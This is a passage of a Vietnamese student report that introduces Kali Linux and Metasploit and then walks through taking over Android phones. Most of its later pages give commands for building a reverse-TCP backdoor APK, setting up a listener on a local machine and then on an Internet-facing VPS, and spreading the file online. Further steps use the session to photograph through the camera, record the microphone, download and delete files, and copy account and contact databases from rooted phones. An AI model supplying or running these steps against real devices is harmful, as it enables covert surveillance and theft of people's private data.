đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới. Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà Trang 12 chưa từng nghe về BackTrack. Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn võ thuật của người Philippine ... Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp. - Ưu điểm và Nhược điểm: Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản phân phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân loại rõ ràng để sử dụng.
  • 13. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là một yêu cầu vô cùng quan trọng. Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các công cụ. Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Trang 13 3.1.2. Hỗ trợ mạng không dây tốt hơn Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây. 3.1.3. Khả năng tùy biến cao Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng. 3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái). Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa. 3.2.Cài đặt Kali Linux
  • 14. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 14
  • 15. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 15
  • 16. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 16
  • 17. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 17
  • 18. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 18
  • 19. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 19
  • 20. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 20
  • 21. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 21
  • 22. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 22
  • 23. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 23
  • 24. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 3.3.Metasploit framework trong Kali linux 3.3.1. Giới thiệu Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode (payload) để tấn công máy có lỗ hổng.Cùng với một số bộ công cụ bảo mật khác. Metasploit có cơ sở dữ liệu chứa hàng ngàn shellcode,hàng ngàn exploit của các hệ điều hành,các chương trình hay dịch vụ.Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó càng trở thành một bộ công cụ mạnh mẽ. Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…) 3.3.2. Sử dụng metasploit framework 3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để Trang 24 khai thác Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit framework có hỗ trợ. Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là tên của exploit đc metasploit hỗ trợ. Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit". Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là: use windows/manage/add_user_domain 3.3.2.2.Cấu hình module exploit đã chọn Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử dụng lệnh "show options". Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau: Name--------------Current Setting----------------Required---------------Description Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no" thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích hợp với chúng ta hay không. Ta dùng lệnh “set” để cấu hình những options của module đó. Ngoài ra nó còn có thêm một số options khác,dùng "show advanced", "show evasion" để xem. Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách
  • 25. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 nhanh để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự có thể kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết được. Trang 25 3.3.2.3.Lựa chọn payload Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó, hoặc dùng để kết nối về máy của hacker. Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. Đó là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó đột nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi victim sơ ý nhận nó. Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show payloads". Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác nhau. Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản đó là bind payload và reverse payload. Khi nào ta dùng loại nào? Đây cũng là một vấn đề quan trọng. Nếu như máy của chúng ta (đóng vai trò là hacker) đứng sau một tường lửa, thì lúc này ta nên dùng bind payload. Mở một port trên máy tính và kết nối trực tiếp từ máy hacker đến máy victim. Còn nếu như victim đứng sau một tường lửa, còn chúng ta thì không. Khi đó chúng ta dùng reverse payload để connect ngược từ máy victim về máy chúng ta. Như vậy cho thấy khi tấn công mục tiêu, ta phải tìm hiểu rõ ràng về mục tiêu, tìm kiếm tất cả các thông tin có thể có. Dựa vào đó mà ta chọn cách thích hợp. Khi ta quyết định chọn một payload nào đó, dùng lệnh "set PAYLOAD name_payload" để chọn payload cần dùng. Giả sử muốn dùng payload windows/meterpreter/reverse_ord_tcp thì ta thao tác là: set PAYLOAD windows/meterpreter/reverse_ord_tcp Ta nhận đc là: PAYLOAD => windows/meterpreter/reverse_ord_tcp Tượng tự để xem rõ thông tin, options về payload ta có thể dùng các lệnh như "show options", "info name_payload" ,"show advanced",… Sau khi thực hiện tất cả các thiết lập xong thì ta dùng lệnh "exploit" để xem kết quả. 3.4.Tấn công android dùng Metasploit Framework trong Kali Linux
  • 26. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh: msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R > /root/Desktop/app.apk Trong đó 192.168.159.128 là địa chỉ ip của máy Kali.Chúng ta có thể xem nó bằng cách dùng lệnh: Trang 26 ifconfig
  • 27. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Và đây là file app.apk mà chúng ta vừa tạo Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh: Trang 27 msfconsole
  • 28. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Chúng ta cài đặt các thông số cần thiết Trang 28 use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.159.128 set lport 8080 Với lhost và lport giống với khi chúng ta tạo file app.apk Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp vào nút Reverse_tcp:
  • 29. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau: Trang 29 Để xem thông tin về máy, nhập lệnh sysinfo - Sử dụng camera: Để xem danh sách camera, nhập webcam_list
  • 30. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Để chụp hình bằng camera, nhập webcam_snap a với a là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau: Trang 30 - Ghi âm Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
  • 31. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 31 - Lấy file từ sd card Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục Ta tải file app.apk trong thư mục Download của sdcard Dùng lệnh cd /sdcard/Download để vào thư mục
  • 32. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh Trang 32 download app.apk Và file này sẽ được tải về thư mục root của máy Kali 4. Thực hiện xâm nhập android thông qua mạng Internet 4.1.Giới thiệu về VPS 4.1.1. VPS là gì? Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local. Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
  • 33. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,…. 4.1.2. Đặc điểm về thông số VPS Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ thống. Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 4.1.3. Giá trị khi sử dụng VPS Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp. Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh. Trang 33
  • 34. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 34 4.2.Cài đặt metasploit Để cài đặt metasploit trước tiên ta phải vào trang http://metasploit.com để tải bộ cài đặt metasploit về máy của mình. Ta nhấp vào phần Free Metasploit Download và nó sẽ hiện ra trang bên dưới Ở đây mình sẽ down bản METASPLOIT COMMUNITY. Sau khi nhấp vào link, nó sẽ xuất hiện một trang đăng kí. Mình nhập thông tin đầy đủ và nhấp vào SUBMIT & DOWNLOAD để nhận một license
  • 35. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Tiếp theo nó sẽ xuất hiện trang download, ta sẽ chọn bản phù hợp. Sau khi tải xong, ta bắt đầu tiến trình cài đặt. Trước tiên ta nhấp vào bản cài đặt và nhấn Next Trang 35
  • 36. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Bên dưới ta chọn thư mục để cài đặt và nhấn Next Ta phải đảm bảo rằng các phần mềm diệt virut đều được đóng, nếu không nó sẽ ngăn cản việc cài đặt Trang 36
  • 37. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 SLL Port, Server Name và Days of validity ta để mặc định Trang 37 Ta tiếp tục nhấn Next để bắt đầu cài đặt
  • 38. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Cài đặt xong ta nhấp Finish để kết thúc việc cài đặt Sau khi kết thúc việc cài đặt, ta sẽ vào link http://localhost:3790/ để đăng kí tài khoản. Ta nhấp đầy đủ theo những yêu cầu bên dưới và nhấn Create Account Trang 38
  • 39. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Sau đó trình duyệt sẽ chuyển đến trang nhập key để active chương trình Ta vào địa chỉ mail mà ta đã sử dụng khi download bộ cài đăt metasploit, điền key vào và nhấn ACTIVE LICENSE Trang 39
  • 40. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 40 Như vậy là ta đã có một tài khoản metasploit 4.3.Xâm nhập vào thiết bị android Trước tiên ta mở Terminal trong Kali Linux lên và gõ lệnh để tạo một backdoor: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.184 lport=4444 R> /root/Desktop/app.apk Trong đó 14.0.21.184 là địa chỉ máy VPS của ta. /root/Desktop/app.apk là đường dẫn chứa file vừa tạo.
  • 41. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Sau khi tạo một backdoor được tạo, ta tải nó lên mạng. Khi máy android down về cài đặt và truy cập vào thì sẽ hiện lên như bên dưới: Ta vào máy VPS và mở Metasploit Console lên Trang 41
  • 42. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Sau đó ta sẽ đánh các lệnh như bên dưới để tạo một môi trường và liên kết với máy android mà ta sẽ tấn công: Trang 42 use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 14.0.21.184 set lport 4444 run Ở đây lhost và lport phải giống với lhost và lport khi tạo backdoor Khi máy android nhấp vào biểu tượng có chữ ReverseTCP thì sẽ có thông báo là đã kết nối
  • 43. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Ta gõ lệnh help để hiện lên các lệnh mà ta có thể sử dụng để hack android Trang 43 - Xem thông tin Ta dùng lệnh sysinfo để xem thông tin máy android
  • 44. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 44 - Xem camera Ta dùng lênh webcam_list để xem danh sách các camera Ta dùng lệnh webcam_snap x để chụp một bức ảnh từ camera của máy android. Trong đó: x là 1: Back Camera 2: Front Camera Để di chuyển đến thư mục nào ta dùng lệnh cd<đường dẫn đến thư mục> Lệnh ls để xem trong thư mục có những gì Ta vào thư mục /sdcard/Download để down file về
  • 45. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 45 - Download file Ta dùng lệnh download<tên file> để down file đó về máy VPS của ta Muốn xóa một file ta dùng lệnh rm<tên file>
  • 46. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 46 - Đánh cắp tài khoản, danh bạ Để đánh cắp tài khoản trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được root trước đó. Ta dùng lệnh shell để vào hệ thống Dùng lệnh su để toàn quyền truy cập Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện thông báo là unknown uid 0 Ta gõ cd /data/system để vào thư mục system Tiếp theo gõ ls –l để xem trong thư mục có gì
  • 47. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh download file accounts.db về máy VPS của chúng ta Trang 47
  • 48. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 48 Tiếp tục ta vào địa chỉ cd /data/data/com.android.providers.contacts/databases Để copy file contacts2.db về Sdcard bằng lệnh cp contacts2.db /sdcard Sau đó ta download file contacts2.db về máy VPS
  • 49. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào VPS của chúng ta Trang 49
  • 50. LÊ TRẦN XUÂN LÃNH LỚP CNTT CA SÁNG 2-4-6 Trang 50